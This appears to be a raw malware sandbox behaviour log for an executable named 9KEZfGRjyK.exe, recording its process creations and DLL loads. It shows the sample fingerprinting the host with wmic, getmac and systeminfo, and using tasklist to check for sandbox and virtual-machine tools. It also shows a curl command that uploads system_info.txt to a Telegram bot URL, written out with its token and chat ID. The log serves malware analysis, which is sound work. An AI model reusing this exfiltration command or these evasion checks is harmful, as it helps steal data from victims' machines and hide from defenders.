Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" csproduct get identifyingnumber
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\getmac.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\curl.exe "curl" -k -F chat_id=-4193710271 -F document=@system_info.txt;filename=528110-4174-1.log https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument
Source: C:\Windows\System32\curl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" bios get serialnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" baseboard get serialnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" cpu get nameJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" computersystem get totalphysicalmemoryJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" diskdrive get model,sizeJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayNameJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\getmac.exe "getmac"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\systeminfo.exe "systeminfo"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m sbiedll.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m dbghelp.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m api_log.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m dir_watch.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m pstorec.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m vmcheck.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m wpespy.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxservice.exe"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxtray.exe"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" csproduct get identifyingnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\curl.exe "curl" -k -F chat_id=-4193710271 -F document=@system_info.txt;filename=528110-4174-1.log https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exeSection loaded: schannel.dll
Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\systeminfo.exe "systeminfo"
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m sbiedll.dll
Source: 9KEZfGRjyK.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
